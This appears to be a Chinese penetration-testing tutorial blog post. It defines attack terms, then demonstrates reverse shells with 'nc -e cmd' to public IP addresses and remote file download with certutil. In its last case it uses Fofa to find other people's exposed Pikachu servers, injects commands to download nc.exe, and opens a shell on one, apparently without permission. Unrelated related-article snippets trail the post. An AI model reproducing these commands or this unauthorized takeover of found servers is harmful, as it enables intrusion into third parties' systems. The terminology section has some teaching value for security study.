01-操作系统_名词_文件下载_反弹

操作系统_名词_文件下载_反弹

  • 一、渗透测试
    • 1.1、POC、EXP、Payload与Shellcode
    • 1.2、后门
    • 1.3、木马
    • 1.4、反弹
    • 1.5、回显
    • 1.6、跳板
    • 1.7、黑白盒测试
    • 1.8、暴力破解
    • 1.9、社会工程学
    • 1.10、撞库
    • 1.11、ATT&CK
  • 二、案例演示
    • 2.1、基础案例1:操作系统-用途&命令&权限&用户&防火墙
      • 2.1.1、Linux常见命令
      • 2.1.2、windows常见命令
        • 2.1.3、文件权限
      • 2.1.3、Linux用户和用户组
        • 2.1.5、自带防火墙出站&入站规则协议
    • 2.2、实用案例1:文件上传下载-解决无图形化&解决数据传输
    • 2.3、反弹shell命令-解决数据回显&解决数据通讯
      • 2.3.1、结合案例1:防火墙绕过-正向连接&反向连接&内网服务器
        • 2.3.1.1、内网
        • 2.3.1.2、防火墙
      • 2.3.2、结合案例2:Fofa拿下同行Pikachu服务器
  • 三、涉及资源

  • 参考视频:https://www.bilibili.com/video/BV1Ay4y1K7X6/?spm_id_from=333.999.0.0&vd_source=93ef4007c464e7143f2a9fb5be297117

一、渗透测试

1.1、POC、EXP、Payload与Shellcode

  • POC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。

  • EXP:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。

  • Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。

  • Shellcode:简单翻译 ’ shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。

  • 几点注意

    • POC是用来证明漏洞存在的,EXP是用来利用漏洞的,两者通常不是一类,或者说,PoC通常是无害的,Exp通常是有害的,有了POC,才有EXP。
    • Payload有很多种,它可以是Shellcode,也可以直接是一段系统命令。同一个Payload可以用于多个漏洞,但每个漏洞都有其自己的EXP,也就是说不存在通用的EXP。
    • Shellcode也有很多种,包括正向的,反向的,甚至meterpreter。
    • Shellcode与Shellshcok不是一个,Shellshock特指14年发现的Shellshock漏洞。

1.2、后门

  • 这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置,用于访问、查看或者控制这台主机。
  • 这些改动表面上是很难被察觉的,就好象是入侵者偷偷的配了一把主人房间的钥匙,或者在不起眼处修了一条按到,可以方便自身随意进出。
  • 通常大多数木马程序都可以被入侵者用于创建后门(BackDoor)。
  • Webshell:专门针对web应用(网站)的后门。

1.3、木马

  • 就是那些表面上伪装成了正常的程序,但是当这些程序运行时,就会获取系统的整个控制权限。
  • 有很多黑客就是热衷使用木马程序来控制别人的电脑,比如灰鸽子、Gh0st、PcShare等等。

1.4、反弹

  • 反弹shell是一种网络攻击技术,其基本思想是将受害者的命令行交互(input-output)传输到攻击者的机器上,使得攻击者能够主动地与受害者的系统建立连接并进行控制。

1.5、回显

  • 回显通常指的是显示正在执行的命令及其执行结果的过程。

1.6、跳板

  • 跳板,简单来说,就是为了隐藏自己的地址,让别人无法查找到自己的位置。
  • 通过跳板的使用,可以减少他人查找到你的可能性,同时也增加了被发现的难度。举个简单例子,你在A朋友家玩儿,发现了通往B朋友家的后门,然后你来到了B朋友家,又发现了C朋友家的厨房是和B朋友家相连的,你就顺便来到了C朋友的家,同时C朋友家的厕所又是和D朋友家相连。你在A朋友家做了一些事情,比如设置和修改。A朋友回家了,他会发现有人进了自己的家,但是他顺着路线可以找到B朋友家,通过长期的寻找,终于找到了C朋友家,但他遇见难题了,他并不知道是B朋友家的人动了自己的东西,还是D朋友家的人动了自己的东西。这时,你就是安全的了。这中间的各种朋友关系,其实就是你的跳板。通过这种跳板的转换,我们可以改变自己上网的IP位置,隐藏自己的真实物理位置。

1.7、黑白盒测试

  • 白盒测试:是指实际运行被测程序,通过程序的源代码进行测试而不使用用户界面。这种类型的测试需要从代码句法发现内部代码在算法、溢出、路径和条件等方面的缺点或者错误,进而加以修正。
  • 黑盒测试:又称功能测试、数据驱动测试或基于规格说明的测试,是通过使用整个软件或某种软件功能来严格地测试,,而并没有通过检查程序的源代码,或者很清楚地了解该软件的源代码程序具体是怎样设计的。测试人员通过输入他们的数据看输出的结果,从而了解软件怎样工作。应该更适合测试网页游戏。

1.8、暴力破解

  • 是一种常见的网络安全攻击方法,它利用计算机程序自动尝试大量的密码组合来破解密码。

1.9、社会工程学

  • 为某些非容易的获取讯息,利用社会科学(此指其中的社会常识)尤其心理学,语言学,欺诈学将其进行综合,有效的利用,并以获得信息为最终目的学科称为“社会工程学”总体上来说,社会工程学就是使人们顺从你的意愿、满足你的欲望的一门艺术与学问。

1.10、撞库

  • 撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登录的用户。
  • 很多用户在不同网站使用的是相同的帐号密码,因此黑客可以通过获取用户在A网站的账户从而尝试登录B网址,这就可以理解为撞库攻击。

1.11、ATT&CK

  • 可以简单理解为描述攻击者技战术的知识库。
  • MITRE在2013年推出了该模型,它是根据真实的观察数据来描述和分类对抗行为。
  • ATT&CK将已知攻击者行为转换为结构化列表,将这些已知的行为汇总成战术和技术,并通过几个矩阵以及结构化威胁信息表达式(STIX)、指标信息的可信自动化交换(TAXII)来表示。

二、案例演示

2.1、基础案例1:操作系统-用途&命令&权限&用户&防火墙

2.1.1、Linux常见命令

  • https://blog.csdn.net/liangpingguo/article/details/79140780

2.1.2、windows常见命令

  • https://www.cnblogs.com/air-of-code/p/6015590.html
2.1.3、文件权限
  • https://blog.csdn.net/Cyan_Jiang/article/details/129472605

2.1.3、Linux用户和用户组

  • https://www.cnblogs.com/auguse/articles/11627325.html
2.1.5、自带防火墙出站&入站规则协议
  • https://www.cnblogs.com/whalesea/p/11451604.html
  • https://blog.csdn.net/weixin_53009585/article/details/129472804

2.2、实用案例1:文件上传下载-解决无图形化&解决数据传输

Linux:wget curl python ruby perl java
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32

在这里插入图片描述

  • https://forum.ywhack.com/bountytips.php?download
    在这里插入图片描述
    在这里插入图片描述

2.3、反弹shell命令-解决数据回显&解决数据通讯

useradd 用户名 passwd 用户名
测试Linux系统添加用户或修改密码命令交互回显问题

2.3.1、结合案例1:防火墙绕过-正向连接&反向连接&内网服务器

2.3.1.1、内网
内网 -> xiaodi8
  • 内网:

    • 获取xiaodi8.com的IP地址:47.75.212.155
      在这里插入图片描述
    • nc -e cmd 47.75.212.155 5577 通过使用 nc 工具,连接到指定的 IP 地址和端口号,并在远程主机上执行一个命令行 shell(将当前终端发送到远程主机上)。
      在这里插入图片描述
  • xiaodi8:

    • 使用nc监听主机端口 5577
      在这里插入图片描述
  • 内网的IP地址:
    在这里插入图片描述

  • 此时在xiaodi8上查看IP地址(xiaodi8获取到内网的终端):
    在这里插入图片描述

xiaodi8! -> 内网
  • 内网:

    • IP地址:192.168.46.157
  • xiaodi8:

    • nc -e cmd 192.168.146.157 5577
      在这里插入图片描述
  • 内网:

    • 监听端口5577,没有监听到信息(解决办法:端口映射)
      在这里插入图片描述
2.3.1.2、防火墙
xiaodi8 <- aliyun
  • xiaodi8:

    • 发送终端到47.94.236.117的5566端口
      在这里插入图片描述
  • aliyun:

    • 打开端口监听,监听到信息
      在这里插入图片描述
    • 发送终端到www.xiaodi8.com的5566端口(命令和nc的效果一样)
      在这里插入图片描述
  • xiaodi8:

    • 监听端口,获取到信息:
      在这里插入图片描述
aliyun !-> xiaodi8防火墙	# 以aliyun为基准看,正向连接

正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有公网ip的情况下。

  • xiaodi8:

    • 打开防火墙:
      在这里插入图片描述
  • aliyun:

  • 发送终端到www.xiaodi8.com的5566端口(命令和nc的效果一样)
    在这里插入图片描述

  • xiaodi8:

    • 监听端口,没有获取到信息:
      在这里插入图片描述
xiaodi8防火墙- > aliyun	# 以aliyun为基准看,反向连接

反向连接是控制主机监听一个端口,由受害主机反向去连接控制主机的过程,适用于受害主机出网(或出网且没有公网ip)的情况。

  • xiaodi8:

    • 发送终端到aliyun的5566端口
      在这里插入图片描述
  • aliyun:

    • 进行监听,监听到信息:
      在这里插入图片描述

2.3.2、结合案例2:Fofa拿下同行Pikachu服务器

  • 文件下载&反弹shell:
certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe
nc -e cmd 47.75.212.155 5566
  • 使用Fofa搜索Pikachu:
    在这里插入图片描述
    在这里插入图片描述

  • 测试Pikachu的命令执行漏洞是否能够执行命令:
    在这里插入图片描述
    在这里插入图片描述

  • 不行,换下一个:
    在这里插入图片描述

  • 找到一个可以执行的网站:
    在这里插入图片描述

  • 127.0.0.1 & ipconfig
    在这里插入图片描述

  • 接下来的思路是:将nc上传到对方的主机上去,再执行命令反弹回来

  • 127.0.0.1 & dir 查看文件夹:
    在这里插入图片描述

  • 127.0.0.1 & certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe 上传文件
    在这里插入图片描述

  • nc -e cmd 47.75.212.155 5566 反弹shell到自己的服务器端口:
    在这里插入图片描述

  • 在自己的主机上开启监听,成功获取到shell:
    在这里插入图片描述

三、涉及资源

  • https://www.cnblogs.com/sunny11/p/13583083.html
  • https://forum.ywhack.com/bountytips.php?download
  • https://forum.ywhack.com/reverse-shell/
  • https://blog.csdn.net/weixin_43303273/article/details/83029138

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/370628.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

AI-数学-高中-22-tanx的图像与性质

原作者视频&#xff1a;三角函数】9tanx的图像与性质&#xff08;易中档&#xff09;_哔哩哔哩_bilibili 做题时注意先画图&#xff0c;再计算。

电脑显示mfc140u.dll丢失怎么修复,这几个方法都可以解决

当打开软件时出现"mfc140u.dll丢失"的错误提示&#xff0c;通常是由于缺少或损坏了Microsoft Foundation Class (MFC)库文件导致的。MFC是Microsoft提供的一套用于开发Windows应用程序的类库&#xff0c;它包含了许多常用的功能和组件。 1、以下是可能导致"mfc…

BFS——双向广搜+A—star

有时候从一个点能扩展出来的情况很多&#xff0c;这样几层之后搜索空间就很大了&#xff0c;我们采用从两端同时进行搜索的策略&#xff0c;压缩搜索空间。 190. 字串变换(190. 字串变换 - AcWing题库) 思路&#xff1a;这题因为变化规则很多&#xff0c;所以我们一层一层往外…

Python实战:爬取小红书

有读者在公众号后台询问爬取小红书&#xff0c;今天他来了。 本文可以根据关键词&#xff0c;在小红书搜索相关笔记&#xff0c;并保存为excel表格。 爬取的字段包括笔记标题、作者、笔记链接、作者主页地址、作者头像、点赞量。 一、先看效果 1、爬取搜索页 2、爬取结果保存到…

2-12 SDATR的训练与测试

2.12 SDATR的训练与测试 使用环境:3卡服务器SDATR 服务器代码地址:/home/lihuanyu/code/036SDATR 本地代码地址:F:\BaiduNetdiskDownload\code\036SDATR 2.12.1 训练文件修改 输入数据修改 载入词汇修改 短点保存修改 权重保存修改 其他位置修改:

docker搭建Mysql集群准备(一)

docker搭建Mysql集群准备 Linux基本知识&#xff1a; 修改机器 IP&#xff0c;变成静态 IP vim /etc/sysconfig/network-scripts/ifcfg-ens33 文件 TYPEEthernet PROXY_METHODnone BROWSER_ONLYno BOOTPROTOstatic IPADDR192.168.190.67 NETMASK255.255.255.0 GAT…

优秀学习网站推荐-第一辑

原文地址&#xff1a;https://jaune162.blog/2024/02/15/study-website-recommend Developer Roadmaps&#xff08;开发者路线图&#xff09; 官网地址&#xff1a;https://roadmap.sh/ 该网站包含了各个方向、各个语言的开发人员从零开始学习的路线图。 下图为Java方向的学…

1997-2022年中央对各省份一般公共预算转移支付数据

1997-2022年中央对各省份一般公共预算转移支付数据 1、时间&#xff1a;1997-2022年 2、范围&#xff1a;31省 3、指标&#xff1a;一般公共预算转移支付 4、来源&#xff1a;wind 财政部 5、指标解释&#xff1a;一般性转移支付又称体制性转移支付&#xff0c;是指上级政…

回归预测 | Matlab基于OOA-LSSVM鱼鹰算法优化最小二乘支持向量机的数据多输入单输出回归预测

回归预测 | Matlab基于OOA-LSSVM鱼鹰算法优化最小二乘支持向量机的数据多输入单输出回归预测 目录 回归预测 | Matlab基于OOA-LSSVM鱼鹰算法优化最小二乘支持向量机的数据多输入单输出回归预测预测效果基本介绍程序设计参考资料 预测效果 基本介绍 Matlab基于OOA-LSSVM鱼鹰算法…

Linux---进程间通信 | 管道 | PIPE | MKFIFO | 共享内存 | 消息队列

管道 管道是UNIX中最古老的进程间通信的形式&#xff0c;我们把从一个进程连接到另一个进程的数据流称为一个管道。 一个文件&#xff0c;可以被多个进程打开吗&#xff1f;可以&#xff0c;那如果一个进程打开文件&#xff0c;往文件里面写数据&#xff0c;另一个进程打开文…

SQL Server之DML触发器

一、如何创建一个触发器呢 触发器的定义语言如下&#xff1a; CREATE [ OR ALTER ] TRIGGER trigger_nameon {table_name | view_name}{for | After | Instead of }[ insert, update,delete ]assql_statement从这个定义语言我们可以知道如下信息&#xff1a; trigger_name&…

supervision区域行人计数和轨迹追踪初步尝试

1、背景介绍 最近&#xff0c;一位朋友向我介绍了定位与视觉融合的需求&#xff0c;我发现这个想法非常有价值。恰逢我了解到了Supervision框架&#xff0c;便决定尝试运用它来进行初步的测试。这样做不仅有助于探索可以实际应用的项目&#xff0c;还能促进我自己在研究创新方…

035 Arrays类

示例 int[] nums new int[10]; // fill Arrays.fill(nums, 666); System.out.println(Arrays.toString(nums)); // sort nums new int[]{1, 3, 5, 7, 9, 2, 4, 6, 8}; Arrays.sort(nums); System.out.println(Arrays.toString(nums)); // equals int[] nums2 new int[]{1,…

Linux 驱动开发基础知识——内核对设备树的处理与使用(十)

个人名片&#xff1a; &#x1f981;作者简介&#xff1a;学生 &#x1f42f;个人主页&#xff1a;妄北y &#x1f427;个人QQ&#xff1a;2061314755 &#x1f43b;个人邮箱&#xff1a;2061314755qq.com &#x1f989;个人WeChat&#xff1a;Vir2021GKBS &#x1f43c;本文由…

angular2 开发遇到的问题

1&#xff1a;插件使用&#xff0c;要一同引入 不然报错 “ \ Changes detected. Rebuilding...X [ERROR] NG8001: sf-dashboard-overview is not a known element:”

Golang 并发控制方式有哪些

Go语言中的goroutine是一种轻量级的线程&#xff0c;其优点在于占用资源少、切换成本低&#xff0c;能够高效地实现并发操作。但如何对这些并发的goroutine进行控制呢&#xff1f; 一提到并发控制&#xff0c;大家最先想到到的是锁。Go中同样提供了锁的相关机制&#xff0c;包…

C++进阶(十)哈希的应用——位图布隆过滤器

&#x1f4d8;北尘_&#xff1a;个人主页 &#x1f30e;个人专栏:《Linux操作系统》《经典算法试题 》《C》 《数据结构与算法》 ☀️走在路上&#xff0c;不忘来时的初心 文章目录 一、位图1、位图概念2、位图的实现3、位图的应用 二、布隆过滤器1、布隆过滤器提出2、布隆过滤…

ZYNQ:CAN总线功能应用

前言 上篇文章解决了ZYNQ搭建PS和PL系统的问题&#xff0c;相当于完成最小系统板搭建。因此&#xff0c;本篇文章主要用于记录搭建CAN外设系统会出现的问题。由于ZYNQ系统包含PS和PL两个部分&#xff0c;PS部分往往问题较少&#xff0c;所以考虑先搭建PS系统的CAN外设系统。熟…

微信网页授权之使用完整服务解决方案

目录 微信网页授权能力调整造成的问题 能力调整的内容和理由 原有运行方案 is_snapshotuser字段 改造原有方案 如何复现测试场景 小结 微信网页授权能力调整造成的问题 依附于第三方的开发&#xff0c;做为开发者经常会遇到第三方进行规范和开发的调整&#xff0c;如开…

PCL安装以及CGAL构建三维凸包

基础理论专栏目录 - 知乎 (zhihu.com) 凸包问题——概述 - 知乎 (zhihu.com) 1、安装PCL 安装pcl,我的是window10,vs2019。我安装的是1.13 win10系统下 VS2019点云库PCL1.12.0的安装与配置_windows 10使用pcl-CSDN博客 照着上述博客进行配置&#xff0c;再结合这个设置环境变…